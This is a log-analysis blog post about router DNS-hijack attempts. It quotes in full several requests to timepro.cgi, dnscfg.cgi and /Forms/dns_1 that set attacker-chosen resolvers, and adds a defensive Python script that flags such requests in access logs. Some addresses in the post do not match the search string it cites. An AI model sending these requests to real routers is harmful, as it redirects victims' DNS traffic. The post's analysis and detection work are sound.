2022-09-01 Finding interesting requests for timepro.cgi in the logs
There are always attacks in the logs, but this one caught my eye because someone mentioned it, I saw it in logs, and searching for a simple explanation of what I saw gave no answers. Those are the interesting ones. So here is the log line, split into multiple parts in an attempt to make it more readable:

"GET /cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&
sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=126.96.36.199&
fdns_dynamic2=188.8.131.52&fdns_dynamic3=184.108.40.206&
fdns_dynamic4=220.127.116.11&sdns_dynamic1=18.104.22.168&
sdns_dynamic2=22.214.171.124&sdns_dynamic3=126.96.36.199&
sdns_dynamic4=188.8.131.52&userid=&passwd=&mtu=1454&
ip1=192&ip2=168&ip3=254&ip4=2&
sm1=255&sm2=255&sm3=255&sm4=0&
gw1=192&gw2=168&gw3=254&gw4=254&
fdns1=&fdns2=&fdns3=&fdns4=&
sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=150 HTTP/1.1"

Searching for timepro.cgi finds a2004ns-mod/timepro.cgi at master · hklcf/a2004ns-mod · GitHub, which seems to be compiled code:

ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped

Based on Honware: A virtual honeypot framework for capturing CPE and IoT zero days, my best guess is that requests to timepro.cgi attempt to reconfigure a home router. And my next guess is that the attempt is to set the DNS resolvers to 184.108.40.206 and 220.127.116.11. Further searching finds another attempt from the same source IPv4 address which also looks a lot like an attempt to reconfigure DNS settings:

"GET /dnscfg.cgi?dnsPrimary=18.104.22.168&dnsSecondary=22.214.171.124&dnsDynamic=0&dnsRefresh=1 HTTP/1.1"

The theory that this is an attempt to redirect DNS traffic is somewhat confirmed by the fact that 126.96.36.199 indeed runs an open resolver which will give me answers. For the few things I have tried, those are valid answers (no clear attempts to redirect traffic to other places). I get no answers from 188.8.131.52 at the moment.
Update: Searching for the string 128.0.104 finds more:

"POST /dnscfg.cgi?dnsPrimary=184.108.40.206&dnsSecondary=220.127.116.11&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1"

"POST /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=18.104.22.168&dnsSecondary=22.214.171.124 HTTP/1.1"

Based on the names of the parameters I guess more of the same: attempts to redirect DNS traffic.
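The three request shapes quoted above (timepro.cgi with numbered fdns_dynamic/sdns_dynamic fields, dnscfg.cgi and /Forms/dns_1 with dnsPrimary/dnsSecondary) are easy to pull out of an access log automatically, so that the resolver addresses being pushed can be pivoted on the way the update did by string search. The script below is an added example, not code from the post or from the a2004ns-mod project: it parses combined-format log lines, picks out requests to those endpoints, reassembles resolver addresses from either whole-address or per-octet parameters, and groups the results by resolver. The log lines, source addresses and resolver addresses in it are constructed sample data in RFC 5737 documentation ranges, and the endpoint and parameter names are taken as they appear in the quoted requests.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx combined format). The request
# shapes mirror those quoted in the post; all addresses are RFC 5737 documentation
# placeholders, not values from any real log.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Sep/2022:10:00:01 +0000] "GET /cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=198&fdns_dynamic2=51&fdns_dynamic3=100&fdns_dynamic4=53&sdns_dynamic1=203&sdns_dynamic2=0&sdns_dynamic3=113&sdns_dynamic4=53&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2 HTTP/1.1" 404 162
192.0.2.10 - - [01/Sep/2022:10:00:02 +0000] "GET /dnscfg.cgi?dnsPrimary=198.51.100.53&dnsSecondary=203.0.113.53&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 404 162
192.0.2.11 - - [01/Sep/2022:10:05:00 +0000] "POST /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=198.51.100.53&dnsSecondary=203.0.113.53 HTTP/1.1" 404 162
192.0.2.12 - - [01/Sep/2022:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024
192.0.2.13 - - [01/Sep/2022:10:07:00 +0000] "GET /cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&fdns_dynamic1=198.51.100.53&fdns_dynamic2=203.0.113.53&fdns_dynamic3=&fdns_dynamic4= HTTP/1.1" 404 162
"""

# Combined-format request line: source, method, request target and status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Router firmware endpoints from the quoted requests that accept WAN/DNS settings.
DNS_ENDPOINTS = ("/cgi-bin/timepro.cgi", "/dnscfg.cgi", "/Forms/dns_1")
# Parameters that carry one whole resolver address each (dnscfg.cgi, /Forms/dns_1).
WHOLE_ADDR_PARAMS = ("dnsPrimary", "dnsSecondary")
# Numbered families used by timepro.cgi. Assumption: like ip1..ip4 in the same
# request they may carry one octet each, or, as in the quoted log line, a full
# address each; both shapes are handled.
NUMBERED_FAMILIES = ("fdns_dynamic", "sdns_dynamic", "fdns", "sdns")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def is_ipv4(value):
    """True for a dotted quad whose octets are all in 0..255."""
    return bool(IPV4_RE.match(value)) and all(0 <= int(o) <= 255 for o in value.split("."))


def extract_resolvers(query):
    """Return the resolver addresses a DNS-settings query string tries to set."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    found = []
    for name in WHOLE_ADDR_PARAMS:
        if is_ipv4(params.get(name, "")):
            found.append(params[name])
    for family in NUMBERED_FAMILIES:
        parts = [params.get(f"{family}{i}", "") for i in range(1, 5)]
        if all(p.isdigit() and 0 <= int(p) <= 255 for p in parts):
            found.append(".".join(parts))          # four octets -> one address
        else:
            found.extend(p for p in parts if is_ipv4(p))  # full addresses per field
    return list(dict.fromkeys(found))              # dedupe, keep order


def find_dns_reconfig(log_text):
    """Scan log lines and report every request that tries to set DNS resolvers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path not in DNS_ENDPOINTS:
            continue
        resolvers = extract_resolvers(url.query)
        if resolvers:
            hits.append({"src": m["src"], "method": m["method"], "path": url.path,
                         "status": int(m["status"]), "resolvers": resolvers})
    return hits


def resolver_sources(hits):
    """Pivot: which source addresses pushed which resolver address."""
    pivot = {}
    for hit in hits:
        for resolver in hit["resolvers"]:
            pivot.setdefault(resolver, set()).add(hit["src"])
    return pivot


if __name__ == "__main__":
    found_hits = find_dns_reconfig(SAMPLE_LOG)
    for hit in found_hits:
        print(f'{hit["src"]} {hit["method"]} {hit["path"]} -> {", ".join(hit["resolvers"])}')
    for resolver, sources in resolver_sources(found_hits).items():
        print(f"{resolver} pushed by {len(sources)} source(s): {', '.join(sorted(sources))}")
```

Feeding a real access log in place of SAMPLE_LOG gives one line per reconfiguration attempt plus a per-resolver summary, which is the view needed to decide whether a resolver address is worth checking for open-resolver behaviour, as the post did by hand. Requests that hit the endpoints without any resolver-looking parameter are left out on purpose, so plain scanning for the CGI path does not show up as a DNS change.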